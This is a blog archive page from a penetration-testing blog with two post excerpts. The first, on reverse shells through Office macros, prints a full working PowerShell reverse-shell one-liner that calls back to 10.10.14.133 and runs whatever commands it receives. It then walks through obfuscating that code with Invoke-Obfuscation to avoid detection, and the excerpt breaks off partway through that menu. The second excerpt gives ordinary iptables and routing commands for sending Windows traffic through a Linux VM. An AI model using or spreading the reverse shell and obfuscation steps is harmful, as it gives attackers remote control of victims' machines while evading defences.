Skip to main content

Posts

Showing posts from April, 2022

Office Macro's Reverse Shells

  Obfuscate the Powershell code # Powershell one-Liner $client = New-Object System.Net.Sockets.TCPClient('10.10.14.133',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() #save the above rev-shell to a file; rev.txt #Download Invoke-Obfuscation Import-Module ./Invoke-Obfuscation.psd1 Invoke-Obfuscation Output: Choose one of the below options: [*] TOKEN Obfuscate PowerShell command Tokens [*] AST Obfuscate PowerShell Ast nodes (PS3.0+) [*] STRING Obfuscate entire command as a String [*] ENCODING Obfuscate entire command via Encoding [*] COMPRESS Conve

Route Windows through Linux VM

  This is very helpful when you are looking to access a VPN network (or a network accessible from a specific machine) from a different windows box. Assuming you are connected to VPN form Linux box - below commands will help  On Windows route delete 0.0.0.0 route add 0.0.0.0 mask 0.0.0.0 kali_IP on Linux sudo sysctl net.ipv4.ip_forward=1 sudo iptables -t nat -A POSTROUTING -o tun0 -j MASQUERADE sudo iptables -A FORWARD -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT sudo iptables -A FORWARD -i eth0 -o tun0 -j ACCEPT ##tun0 = VPN Network ##eth0 = Windows and Linux Interface  Transparent Proxy sudo sysctl net.ipv4.ip_forward=1 sudo iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 80 -j REDIRECT --to-port 8080 sudo iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 443 -j REDIRECT --to-port 8080